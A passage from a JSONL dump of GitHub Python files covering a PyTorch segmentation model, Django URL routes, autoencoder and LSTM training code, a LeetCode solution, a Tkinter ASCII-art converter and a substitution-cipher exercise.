dilation=1):\n super(SeparableConv, self).__init__(\n nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride, dilation=dilation,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2, groups=in_channels,\n bias=False),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\n )\n\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.ReLU6, drop=0.0):\n super(Mlp, self).__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Conv2d(in_features, hidden_features, 1, 1, 0, bias=True)\n self.act = act_layer()\n self.fc2 = nn.Conv2d(hidden_features, out_features, 1, 1, 0, bias=True)\n self.drop = nn.Dropout(drop, inplace=True)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass MCAM(nn.Module):\n def __init__(self, decode_channel, class_channel):\n super(MCAM, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n b = 1\n gamma = 2\n t = int(abs((math.log(decode_channel, 2) + b) / gamma))\n k = t if t % 2 else t + 1\n r = math.log(k - 1, 2)\n k1 = int(2 ** r + 1)\n k2 = int(2 ** (r + 1) + 1)\n k3 = int(2 ** (r + 2) + 1)\n k4 = int(2 ** (r + 3) + 1)\n self.conv0 = nn.Conv1d(1, 1, kernel_size=k1, padding=(k1 - 1) // 2)\n self.conv1 = nn.Conv1d(1, 1, kernel_size=k2, padding=(k2 - 1) // 2)\n self.conv2 = nn.Conv1d(1, 1, kernel_size=k3, padding=(k3 - 1) // 2)\n self.conv3 = nn.Conv1d(1, 1, kernel_size=k4, padding=(k4 - 1) // 2)\n self.sigmoid = nn.Sigmoid()\n self.cSE = nn.Sequential(nn.Conv2d(decode_channel, decode_channel // 4, 1),\n nn.ReLU(inplace=True), nn.Conv2d(decode_channel // 4, class_channel, 1), nn.Sigmoid())\n self.conv = nn.Conv1d(1, 1, kernel_size=3, padding=1)\n self.fc = nn.Linear(8 * decode_channel, decode_channel)\n self.fc1 = nn.Sequential(ConvBN(decode_channel, class_channel, kernel_size=1), nn.Softmax(dim=1))\n\n def forward(self, x):\n y = self.avg_pool(x).squeeze(-1).transpose(1, 2)\n ym = self.max_pool(x).squeeze(-1).transpose(1, 2)\n y0 = self.conv0(y).transpose(1, 2).unsqueeze(-1)\n y1 = self.conv1(y).transpose(1, 2).unsqueeze(-1)\n y2 = self.conv2(y).transpose(1, 2).unsqueeze(-1)\n y3 = self.conv3(y).transpose(1, 2).unsqueeze(-1)\n ym0 = self.conv0(ym).transpose(1, 2).unsqueeze(-1)\n ym1 = self.conv1(ym).transpose(1, 2).unsqueeze(-1)\n ym2 = self.conv2(ym).transpose(1, 2).unsqueeze(-1)\n ym3 = self.conv3(ym).transpose(1, 2).unsqueeze(-1)\n y_full = torch.cat([y0, y1, y2, y3, ym0, ym1, ym2, ym3], dim=1).squeeze(-1).transpose(1, 2)\n y = self.fc(self.conv(y_full).transpose(1, 2).squeeze(-1))\n y = self.sigmoid(y).unsqueeze(-1).unsqueeze(-1)\n y1 = self.cSE(y)\n print(\"y1: \", y1.shape)\n class_feat = self.fc1(y).squeeze(-1) + y1.squeeze(-1)\n print(class_feat.shape)\n class_matrix = torch.bmm(y.squeeze(3), class_feat.transpose(2, 1)).unsqueeze(3)\n class_matrix = nn.functional.softmax(class_matrix, dim=1)\n class_matrix = nn.functional.softmax(class_matrix, dim=2)\n return class_matrix\n\n\nclass MSAM(nn.Module):\n def __init__(self, decode_channel, size):\n super(MSAM, self).__init__()\n self.h_pools = nn.AvgPool2d(kernel_size=(size, 1))\n self.w_pools = nn.AvgPool2d(kernel_size=(1, size))\n self.conv = ConvBNReLU(decode_channel, decode_channel, kernel_size=3)\n self.bn = nn.BatchNorm2d(decode_channel)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x_m = x\n b, c, h, w = x_m.shape\n x_h = self.h_pools(x_m).view(b * c, 1, w)\n x_w = self.w_pools(x_m).view(b * c, h, 1)\n qk = torch.bmm(x_w, x_h).view(b, c, h * w)\n v = self.conv(x_m.view(b, c, h, w) * nn.functional.softmax(qk, -1).view(b, c, h, w) + x_m)\n return v\n\n\nclass CIAFM(nn.Module):\n def __init__(self, in_channels, key_channels, out_channels, dropout_rate=0.0):\n super(CIAFM, self).__init__()\n self.in_channels = in_channels\n self.key_channels = key_channels\n self.f_query = ConvBNReLU(in_channels, key_channels, kernel_size=3, stride=1)\n self.f_key = ConvBNReLU(in_channels, key_channels, kernel_size=1)\n self.f_value = ConvBNReLU(in_channels, key_channels, kernel_size=1)\n self.f_up = ConvBNReLU(key_channels, in_channels, kernel_size=1)\n self.fuse = ConvBNReLU(in_channels, in_channels, kernel_size=3, stride=1)\n self.conv3x3 = nn.Sequential(ConvBNReLU(in_channels, out_channels, 3, 1))\n self.conv1x1 = nn.Sequential(\n ConvBNReLU(2 * in_channels, out_channels, 1), nn.Dropout2d(dropout_rate)\n )\n\n def forward(self, x, proxy):\n x_shape = x.shape\n query = self.f_query(x)\n query = torch.reshape(query, (x_shape[0], self.key_channels, -1))\n query = query.transpose(1, 2)\n key = self.f_key(proxy)\n key = torch.reshape(key, (x_shape[0], self.key_channels, -1))\n value = self.f_value(proxy)\n value = torch.reshape(value, (x_shape[0], self.key_channels, -1))\n value = value.transpose(1, 2)\n min_map = torch.matmul(query, key)\n min_map = (self.key_channels ** -0.5) * min_map\n min_map = nn.Softmax(dim=1)(min_map)\n context = torch.matmul(min_map, value)\n context = context.transpose(2, 1)\n context = torch.reshape(\n context, (x_shape[0], self.key_channels, x_shape[2], x_shape[3])\n )\n context = self.f_up(context)\n context = self.fuse(context + x)\n space_pixels = self.conv3x3(x)\n out_feats = torch.cat([context, space_pixels], dim=1)\n out_feats = self.conv1x1(out_feats)\n return out_feats\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_classes, size, dropout_rate=0.2):\n super(Attention, self).__init__()\n self.channel_attn = MCAM(dim, num_classes)\n self.space_attn = MSAM(dim, size)\n self.af = CIAFM(dim, dim // 2, dim, dropout_rate)\n\n def forward(self, x, skip):\n x = skip + x\n c_attn = self.channel_attn(x)\n s_attn = self.space_attn(x)\n out = self.af(s_attn, c_attn)\n return out\n\n\nclass Block(nn.Module):\n def __init__(self, dim, classes_dim, size, mlp_ratio=4.0, drop=0.2, upSample=False, drop_path=0.0,\n act_layer=nn.ReLU6, norm_layer=nn.BatchNorm2d):\n super(Block, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_classes=classes_dim, size=size, dropout_rate=drop)\n self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, out_features=dim, act_layer=act_layer,\n drop=drop)\n self.norm2 = norm_layer(dim)\n self.upSample = upSample\n if self.upSample:\n self.conv = ConvBNReLU(dim, dim, kernel_size=3)\n\n def forward(self, x, skip):\n x = x + self.drop_path(self.attn(self.norm1(x), self.norm1(skip)))\n out = x + self.drop_path(self.mlp(self.norm2(x)))\n if self.upSample:\n out = F.interpolate(x, scale_factor=2, mode=\"bilinear\", align_corners=True)\n out = self.conv(out)\n return out\n\n\nclass Decoder(nn.Module):\n def __init__(self, encoder_channels, decoder_channels, num_classes, size=(128, 64, 32, 16), dropout_rate=0.1):\n super(Decoder, self).__init__()\n\n self.conv1 = ConvBN(encoder_channels[0], decoder_channels, kernel_size=3)\n self.conv2 = ConvBN(encoder_channels[1], decoder_channels, kernel_size=3)\n self.conv3 = ConvBN(encoder_channels[2], decoder_channels, kernel_size=3)\n self.conv4 = ConvBN(encoder_channels[3], decoder_channels, kernel_size=3)\n self.b4 = Block(dim=64, classes_dim=num_classes, size=size[3], drop=dropout_rate, upSample=True)\n self.b3 = Block(dim=64, classes_dim=num_classes, size=size[2], drop=dropout_rate, upSample=True)\n self.b2 = Block(dim=64, classes_dim=num_classes, size=size[1], drop=dropout_rate, upSample=True)\n self.b1 = Block(dim=64, classes_dim=num_classes, size=size[0], drop=dropout_rate)\n\n self.segmentation_head = nn.Sequential(ConvBNReLU(decoder_channels, decoder_channels),\n nn.Dropout2d(p=dropout_rate, inplace=True),\n Conv(decoder_channels, num_classes, kernel_size=1))\n self.init_weight()\n\n def forward(self, res1, res2, res3, res4):\n stage1 = self.conv1(res1)\n stage2 = self.conv2(res2)\n stage3 = self.conv3(res3)\n stage4 = self.conv4(res4)\n b4 = self.b4(stage4, stage4)\n b3 = self.b3(b4, stage3)\n b2 = self.b2(b3, stage2)\n b1 = self.b1(b2, stage1)\n output = self.segmentation_head(b1)\n\n return output\n\n def init_weight(self):\n for m in self.children():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, a=1)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n\nclass AANet(nn.Module):\n def __init__(self, num_classes, decoder_channels, size=(128, 64, 32, 16), backbone_name=\"swsl_resnet18\",\n pretrained=True):\n super(AANet, self).__init__()\n self.backbone = timm.create_model(backbone_name, features_only=True, out_indices=(1, 2, 3, 4),\n pretrained=pretrained)\n encoder_channels = self.backbone.feature_info.channels()\n self.decoder = Decoder(encoder_channels, decoder_channels, num_classes=num_classes, size=size, dropout_rate=0.5)\n\n def forward(self, x):\n res1, res2, res3, res4 = self.backbone(x)\n output = self.decoder(res1, res2, res3, res4)\n output = F.interpolate(output, size=x.shape[2:], mode=\"bilinear\", align_corners=True)\n return output\n\n\nif __name__ == \"__main__\":\n model = AANet(num_classes=6, decoder_channels=64)\n total = sum(p.numel() for p in model.parameters())\n print(\"Total params: %.5fM\" % (total / 1e6))\n x = torch.randn([4, 3, 512, 512])\n model.train()\n out = model(x)\n print(out.shape)\n","repo_name":"chuanqian/AANet","sub_path":"geoseg/models/AANet.py","file_name":"AANet.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12036552138","text":"from django.urls import path\nfrom . import views\n\napp_name = 'optimize'\n\nurlpatterns = [\n path('', views.Index, name=\"index\"),\n\n path('manage/create_folder/', views.PeriodCreateFolder, name=\"period_create_folder\"),\n path('manage/delete_folder/', views.PeriodDeleteFolder, name=\"period_delete_folder\"),\n\n path('manage/manage_folder//', views.PeriodManageFolder, name=\"period_manage_folder\"),\n path('manage/ajax_get_tree_element/', views.period_ajax_get_tree_element, name=\"period_get_tree_element\"),\n\n path('manage/strategy/', views.PeriodManageIndex, name=\"period_manage_index\"),\n path('manage/create_strategy/', views.PeriodCreateStrategy, name=\"period_create_strategy\"),\n path('manage/delete_strategy//', views.PeriodDeleteStrategy, name=\"period_delete_strategy\"),\n path('manage/strategy/manage_strategy//', views.PeriodManageStrategy, name=\"period_manage_strategy\"),\n path('manage/strategy/modify_general//', views.PeriodModifyGeneral, name=\"period_modify_general\"),\n path('manage/export_strategy//', views.PeriodExportStrategy, name=\"period_export_strategy\"),\n path('manage/load_strategy/', views.PeriodLoadStrategy, name=\"period_load_strategy\"),\n\n path('manage/manage_result/', views.PeriodResults, name=\"period_result\"),\n path('manage/launch_strategy//',views.PeriodLaunchStrategy, name=\"period_launch_strategy\"),\n path('manage/launch_state/', views.PeriodLaunchState, name=\"period_launch_state\"),\n path('manage/manage_result//',views.PeriodLaunchResult, name=\"period_launch_result\"), \n\n path('manage/add_strategy//', views.PeriodAddStrategy, name=\"period_add_strategy\"),\n path('manage/change_strategy//', views.PeriodChangeStrategy, name=\"period_change_strategy\"),\n path('manage/remove_strategy//', views.PeriodRemoveStrategy, name=\"period_remove_strategy\"),\n\n path('manage/', views.PeriodManage, name=\"period_manage\"),\n]\n","repo_name":"codemagician45/interactive-django","sub_path":"optimize/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41472364026","text":"import time\nimport torch\nfrom torch import optim\nimport Methods.evaluation as evaluation\nimport Methods.models as method\nimport numpy as np\nimport sys\nsys.path.append(\"../src\")\nimport base\nfrom sklearn.decomposition import PCA\nimport scipy as sp\n\n\n\ndef PRHCP(X, Y, q=2, niter=5):\n\n n, d = X.shape\n t = 0\n tau = 1\n i = 0\n Omega = np.eye(d)\n\n while i Epoch: {} Average RecLoss: {:.4f} RegLoss: {:.4f} TotalLoss: {:.4f}'.format(\n epoch, train_rec_loss / len(train_loader.dataset), train_reg_loss / len(train_loader.dataset),\n (train_rec_loss + train_reg_loss) / len(train_loader.dataset)))\n\n print('Epoch Time = {:.2f}sec'.format(time.time() - epoch_time))\n\n\ndef test(model, test_loader, device, args):\n model.eval()\n test_rec_loss = 0\n test_reg_loss = 0\n test_loss = 0\n with torch.no_grad():\n for i, (data, _) in enumerate(test_loader):\n data = data.to(device)\n recon_batch, z = model(data)\n rec_loss = method.loss_function(recon_batch, data, args.loss_type)\n reg_loss = args.gamma * prhcp_distance(z, device=device)\n test_rec_loss += rec_loss.item()\n test_reg_loss += reg_loss.item()\n test_loss += (rec_loss.item() + reg_loss.item())\n\n test_rec_loss /= len(test_loader.dataset)\n test_reg_loss /= len(test_loader.dataset)\n test_loss /= len(test_loader.dataset)\n print('====> Test set RecLoss: {:.4f} RegLoss: {:.4f} TotalLoss: {:.4f}'.format(\n test_rec_loss, test_reg_loss, test_loss))\n return test_rec_loss, test_reg_loss, test_loss\n\n\ndef train_model(model, train_loader, test_loader, device, args):\n model = model.to(device)\n loss_list = []\n optimizer = optim.Adam(model.parameters(), lr=1e-3, betas=(0.9, 0.999))\n for epoch in range(1, args.epochs + 1):\n train(model, train_loader, optimizer, device, epoch, args)\n test_rec_loss, test_reg_loss, test_loss = test(model, test_loader, device, args)\n loss_list.append([test_rec_loss, test_reg_loss, test_loss])\n if epoch % args.landmark_interval == 0:\n evaluation.interpolation_2d(model, test_loader, device, epoch, args, prefix='prhcp-ae')\n evaluation.sampling(model, device, epoch, args, prefix='prhcp-ae')\n evaluation.reconstruction(model, test_loader, device, epoch, args, prefix='prhcp-ae')\n return loss_list\n","repo_name":"sherlockLitao/HCP","sub_path":"Autoencoder_big(DCGAN)/Methods/prhcpae.py","file_name":"prhcpae.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"38230002116","text":"import torch\nfrom tqdm import tqdm\nimport numpy as np\n\nclass Network(torch.nn.Module):\n\n def __init__(self, in_dim, out_dim, hid_dim, num_lay=1, lr=1):\n\n super(Network, self).__init__()\n\n self.define_network(in_dim, out_dim, hid_dim, num_lay)\n\n self.loss = torch.nn.BCEWithLogitsLoss()\n self.optimizer = torch.optim.SGD(self.parameters(), lr=lr)\n\n if torch.cuda.is_available():\n self.device = torch.device(\"cuda:0\")\n else:\n self.device = torch.device(\"cpu:0\")\n self.to(device=self.device)\n\n self.historical_loss = []\n self.historical_accuracy = []\n\n def define_network(self, in_dim, out_dim, hid_dim, num_lay):\n\n self.lstm = torch.nn.LSTM(\n input_size=in_dim,\n hidden_size=hid_dim,\n num_layers=num_lay)\n\n self.fc = torch.nn.Linear(hid_dim, 1)\n\n self.sigmoid = torch.nn.Sigmoid()\n self.leaky_relu = torch.nn.LeakyReLU()\n\n\n def forward(self, x):\n\n out = torch.Tensor(x).to(self.device)\n\n out = self.lstm(out)\n\n out = self.fc(out[0][-1].reshape(x.shape[1], -1))\n out = self.sigmoid(out)\n\n return out.to(torch.device(\"cpu:0\"))\n\n def optimize(self, x, y, batch_sz, iters):\n \n x = torch.Tensor(x).reshape(x.shape[1], x.shape[0], 1)\n y = torch.Tensor(y)\n\n num_batches = y.shape[0]//batch_sz\n\n for i in tqdm(range(iters), \"Training Network\"):\n \n run_loss = 0\n run_acc = 0\n\n for b in range(num_batches):\n # zero the parameter gradients\n self.optimizer.zero_grad()\n # forward + backward + optimize\n p = self.forward(x[:,b*batch_sz:(b+1)*batch_sz,:])\n #self.accuracy(p, y[b*batch_sz:(b+1)*batch_sz, :])\n loss = self.loss(p, y[b*batch_sz:(b+1)*batch_sz, :])\n \n run_loss += loss.detach()/num_batches\n run_acc += self.accuracy(p, y[b*batch_sz:(b+1)*batch_sz, :])/num_batches\n\n loss.backward()\n self.optimizer.step()\n\n self.historical_loss.append(run_loss)\n self.historical_accuracy.append(run_acc) \n\n def accuracy(self, p, y):\n\n accuracy = ((p > 0.5) == (y > 0.5)).type(torch.FloatTensor).mean()\n\n return accuracy\n\ndef main():\n\n x = np.random.randint(0, high=2, size=[1000, 50], dtype=int)\n y = np.random.randint(0, high=2, size=[1000, 1], dtype=int)\n net = torch.nn.LSTM(1, 10, 1)\n p = net.forward(x.reshape([50, 1000, 1]))\n\n print(len(p))\n print(p[0].shape)\n print(p[0][0].shape)\n\nif __name__ == \"__main__\":\n\n main()","repo_name":"Gregory-Eales/openai-requests-research","sub_path":"XOR-LSTM/network/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12242944993","text":"'''\nThere is a row of n houses, where each house can be painted one of three colors: red, blue, or green.\nThe cost of painting each house with a certain color is different.\nYou have to paint all the houses such that no two adjacent houses have the same color.\n\nThe cost of painting each house with a certain color is represented by an n x 3 cost matrix costs.\n\nFor example, costs[0][0] is the cost of painting house 0 with the color red; costs[1][2] is the cost of painting house 1 with color green, and so on...\n\nReturn the minimum cost to paint all houses.\n'''\nfrom leetcode import *\n\nclass Solution:\n # Bottom-up DP approach\n # Time: O(6*n) = O(n)\n # Space: O(1)\n def minCost(self, costs: List[List[int]]) -> int:\n n = len(costs)\n for i in range(1, n):\n for j in range(3):\n minCost = math.inf\n for k in range(3):\n if k == j:\n continue\n minCost = min(minCost, costs[i - 1][k])\n\n costs[i][j] += minCost\n\n return min(costs[-1])\n\nsolution = Solution()\n\nassert solution.minCost([[17,2,17],[16,16,5],[14,3,19]]) == 10\nassert solution.minCost([[7,6,2]]) == 2\n","repo_name":"abespitalny/CodingPuzzles","sub_path":"Leetcode/paint_house.py","file_name":"paint_house.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72631014628","text":"import time\nimport tkinter as tk\nfrom tkinterdnd2 import TkinterDnD, DND_FILES\nimport os\nfrom PIL import Image, ImageTk\nfrom tqdm import tqdm\n\nfile_name = \"\"\nascii_characters_by_surface_10 = \" .:-=+*#%@\"\nascii_characters_by_surface_65 = '`^\"' + r\",:;Il!i~+_-?][}{1)(|\\/tfjrxnuvczXYUJCLQ0OZmwqpdbkhao*#MW&8%B@$\"\nascii_characters_by_surface = ascii_characters_by_surface_10\n\n# stupid reversing string\nascii_list = list(ascii_characters_by_surface)\nascii_list.reverse()\nascii_characters_by_surface = \"\"\nfor char in ascii_list:\n ascii_characters_by_surface += char\n# stupid reversing string\n\n\ndef pixel_to_ascii(pixel, extension):\n if extension == \".png\":\n if isinstance(pixel, int): # Handle grayscale images where the pixel is an integer\n pixel_brightness = pixel\n max_brightness = 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n index -= 1\n\n else: # Extract color channels from the pixel tuple\n try:\n (R, G, B, A) = pixel\n except:\n (R, G, B) = pixel\n A = 1\n pixel_brightness = 0.299 * R + 0.587 * G + 0.114 * B\n max_brightness = 0.299 * 255 + 0.587 * 255 + 0.114 * 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n if index == 0 and A > 0: # is it black???\n pass\n else:\n index -= 1\n return ascii_characters_by_surface[index]\n elif extension == \".jpg\":\n if isinstance(pixel, int): # Handle grayscale images where the pixel is an integer\n pixel_brightness = pixel\n max_brightness = 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n index -= 1\n\n else: # Extract color channels from the pixel tuple\n (R, G, B) = pixel\n pixel_brightness = 0.299 * R + 0.587 * G + 0.114 * B\n max_brightness = 0.299 * 255 + 0.587 * 255 + 0.114 * 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n if index == 0: # is it black???\n pass\n else:\n index -= 1\n return ascii_characters_by_surface[index]\n # sadly, with this logic, the true white (255, 255, 255, 255) will never be \" \" (blank)\n # I know there is some clear solution to this, but I am just too dumb\n else:\n print(\"I don't support this extension, sry\")\n time.sleep()\n\n\ndef working_with_picture(pic, file_name):\n if \".jpg\" in pic:\n extension = \".jpg\"\n elif \".png\" in pic:\n extension = \".png\"\n else:\n print(\"Bad file extension, need .jpg or .png\")\n input()\n exit()\n image = Image.open(pic)\n (width, height) = image.size\n new_height = int(height*0.3676470588235294)\n image = image.resize((width, new_height))\n ascii_art = []\n for y in tqdm(range(new_height)):\n line = \"\"\n for x in range(width):\n px = image.getpixel((x, y))\n line += pixel_to_ascii(px, extension)\n ascii_art.append(line)\n saving_ascii_art(ascii_art, file_name) # Call the saving_ascii_art function to save the ASCII art\n\n\ndef saving_ascii_art(ascii_art, file_name):\n with open(f\"{file_name}_ascii_image.txt\", \"w\") as f:\n for line in ascii_art:\n f.write(line)\n f.write(\"\\n\")\n\ndef on_drop(event):\n file_path = event.data\n file_name = os.path.basename(file_path)\n file_name = file_name.split(\".\")[0] # get only the name of the file and not the extension\n working_with_picture(str(file_path), file_name)\n # return file_name\n\n\ndef main():\n root = TkinterDnD.Tk()\n root.title(\"Ascii_gene\")\n root.geometry(\"250x150\")\n\n img = Image.open(r\"more.png\")\n img = ImageTk.PhotoImage(img)\n\n label = tk.Label(root, text=\"↓ Drag and drop images here ↓\")\n label.pack(padx=10, pady=10)\n\n img_label = tk.Label(root, image=img)\n img_label.pack(padx=10, pady=10)\n\n root.drop_target_register(DND_FILES)\n root.dnd_bind('<>', on_drop)\n root.mainloop()\n\nif __name__ == '__main__':\n main()","repo_name":"Pataatom/cool_stuff","sub_path":"learning/ASCII_ART.py","file_name":"ASCII_ART.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35961729637","text":"class Solution:\n def wiggleMaxLength(self, nums: List[int]) -> int:\n \n positive = self.helper(0, 1, True, nums, {})\n negative = self.helper(0, 1, False, nums, {})\n \n return max(positive, negative) + 1\n \n def helper(self, prev, index, flag, nums, memo):\n state = (prev, index, flag)\n if state in memo:\n return memo[state]\n \n if index >= len(nums):\n return 0\n take = 0\n skip = 0\n if (flag and nums[index] > nums[prev]) or (not flag and nums[index] < nums[prev]):\n take = 1 + self.helper(index, index + 1, not flag, nums, memo)\n skip = self.helper(prev, index + 1, flag, nums, memo)\n memo[state] = max(take, skip)\n return max(take, skip)\n ","repo_name":"BrukMak/Compititive-Programming-","sub_path":"0376-wiggle-subsequence/0376-wiggle-subsequence.py","file_name":"0376-wiggle-subsequence.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23966626734","text":"import numpy as np\nimport csv\nimport math\nimport matplotlib.pyplot as plt\n# Linear regression\n# Importing data from csv file for X and Y\nx1 = np.array([])\nx2 = np.array([])\nwith open('../ass1_data/logisticX.csv',newline='') as csvfileX:\n\treader = csv.reader(csvfileX)\n\tfor row in reader:\n\t\tx1 = np.append(x1,row[0])\n\t\tx2 = np.append(x2,row[1])\n\t\ny = np.array([])\nwith open('../ass1_data/logisticY.csv',newline='') as csvfileY:\n\treader = csv.reader(csvfileY)\n\tfor row in reader:\n\t\ty = np.append(y,row)\n\n#Normalisation of X\t\n\n#Normalisation of X1 and X2\n\nx1 = x1.astype(np.float)\nx2 = x2.astype(np.float)\ny = y.astype(np.float)\nmeanX1 = np.mean(x1)\nvarX1 = np.var(x1)\nstddevX1 = math.sqrt(varX1)\nxm1 = np.subtract(x1,meanX1)\nnormalisedX1 = np.divide(xm1,stddevX1)\n\nmeanX2 = np.mean(x2)\nvarX2 = np.var(x2)\nstddevX2 = math.sqrt(varX2)\nxm2 = np.subtract(x2,meanX2)\nnormalisedX2 = np.divide(xm2,stddevX2)\n\n# Newton method\ntheta = np.zeros(3)\n\ndef hTheta(x1,x2,theta):\n\tz= x2*theta[2]+x1*theta[1]+theta[0]\n\th = 1/(1+np.exp(-z))\n\treturn h\n\ndef gradient(x1,x2,y,theta):\n\tz1 = np.apply_along_axis(hTheta,0,x1,x2,theta)\n\tz2 = y - z1\n\tg = np.zeros(len(theta))\n\tg[0] = np.sum(z2)\n\tg[1] = np.sum(z2*x1)\n\tg[2] = np.sum(z2*x2)\n\treturn g\n\ndef log_likelihood(x1,x2,y,theta):\n\treturn np.sum(y*np.log(hTheta(x1,x2,theta))+(1-y)*np.log(1-hTheta(x1,x2,theta)))\n\n\ndef hessian(x1,x2,theta):\n\th = np.zeros((len(theta),len(theta)))\n\tz1 = np.apply_along_axis(hTheta,0,x1,x2,theta)\n\ttik = 0\n\ttil = 0\n\th[0][0]= -np.sum(z1*(1-z1))\n\th[0][1]= -np.sum(z1*(1-z1)*x1)\n\th[0][2]= -np.sum(z1*(1-z1)*x2)\n\th[1][0]= h[0][1]\n\th[1][1]= -np.sum(z1*(1-z1)*x1*x1)\n\th[1][2]= -np.sum(z1*(1-z1)*x1*x2)\n\th[2][0]= h[0][2]\n\th[2][1]= h[1][2]\n\th[2][2]= -np.sum(z1*(1-z1)*x2*x2)\n\treturn h\n\n\n#method\n\nllthetanext= log_likelihood(normalisedX1,normalisedX2,y,theta)\nllthetaprev= np.Infinity\nepsilon = 0.0000000000001\n\nwhile (abs(llthetaprev-llthetanext)>epsilon):\n\tg = gradient(normalisedX1,normalisedX2,y,theta)\n\th = hessian(normalisedX1,normalisedX2,theta)\n\thinverse = np.linalg.inv(h)\n\ttheta = theta - hinverse.dot(g)\n\tllthetaprev = llthetanext\n\tllthetanext = log_likelihood(normalisedX1,normalisedX2,y,theta)\n\nprint(\"theta2=\",theta[2])\nprint(\"theta1=\",theta[1])\nprint(\"theta0=\",theta[0])\n\n\n\n\n# PLOTTING THE TRAINING DATA AND DECISION BOUNDARY FIT BY LOGISTIC REGRESSION\nfig, ax = plt.subplots()\nt0x1 = np.array([])\nt0x2 = np.array([])\nt1x1 = np.array([])\nt1x2 = np.array([])\n\n#ax.scatter(normalisedX1,normalisedX2)\nfor i in range(len(normalisedX1)):\n\tif (y[i]==0):\n\t\tt0x1=np.append(t0x1,normalisedX1[i])\n\t\tt0x2=np.append(t0x2,normalisedX2[i])\n\telse :\n\t\tt1x1=np.append(t1x1,normalisedX1[i])\n\t\tt1x2=np.append(t1x2,normalisedX2[i])\n\n\nax.scatter(t0x1, t0x2, c=\"red\",label=\"y(i)=0\")\nax.scatter(t1x1, t1x2, c=\"green\",label=\"y(i)=1\")\n\nplt.plot(normalisedX1, (-theta[0]/theta[2])+((-theta[1]/theta[2])*normalisedX1), color='blue')\nplt.xlabel('normalised X1')\nplt.ylabel('normalised X2')\nplt.title('Decision boundary: '+str(theta[2])+'*x2 +'+str(theta[1])+'*x1+'+str(theta[0])+'=0')\n\t\nax.legend()\t\t\nplt.show()\n\n\n\n","repo_name":"udayinbiswas/Regression-Analysis","sub_path":"Q3/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1097357704","text":"import serial\r\nimport time\r\n\r\ns = serial.Serial(\"COM5\", 9600) #port is 11 (for COM12, and baud rate is 9600\r\ntime.sleep(2) #wait for the Serial to initialize\r\ntxt = 'Ingresar ID'\r\ns.write(txt.encode())\r\ntime.sleep(2)\r\nwhile True:\r\n strs = input('Enter text: ')\r\n strs = strs.strip()\r\n if strs == 'exit' :\r\n strs = 'Gracias'\r\n strs = strs.strip()\r\n s.write(strs.encode())\r\n time.sleep(2)\r\n strs = '--Ctrl Alt Tec--'\r\n strs = strs.strip()\r\n s.write(strs.encode())\r\n time.sleep(3)\r\n exit()\r\n s.write(strs.encode())","repo_name":"Ctrl-Alt-Tec/Kiwi","sub_path":"driver_screen.py","file_name":"driver_screen.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"9787833107","text":"# Simple solution\r\nkey = 'QTGABCDEFHIJKOMNLPRSUVZYXW'\r\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n\r\n\r\ndef decrypt(mess, key):\r\n \"\"\"\r\n This function decrypt the encrypted message with a key\r\n :param mess: encrypted message\r\n :param key: cipher key\r\n :return: decrypted message\r\n :return:\r\n \"\"\"\r\n mess = mess.upper()\r\n new_str = ''\r\n for char in mess:\r\n if char.isalpha(): # or can check if char.upper() in key:\r\n index = key.find(char)\r\n e_char = alphabet[index]\r\n new_str = new_str + e_char\r\n else:\r\n new_str = new_str + char\r\n return new_str\r\n\r\n\r\nprint(decrypt('EBJJM ZMPJA $*^%$*', key))\r\n\r\n\r\n# Another solution using the tricky ord() function (which is not good for special characters)\r\ndef substition_decipher(s, cipher):\r\n \"\"\"\r\n This function decrypts the substitution cipher.\r\n :param s: a string, the message you want to decrypt\r\n :param cipher: the mapping of the 26 letters in the alphabet, e.g. 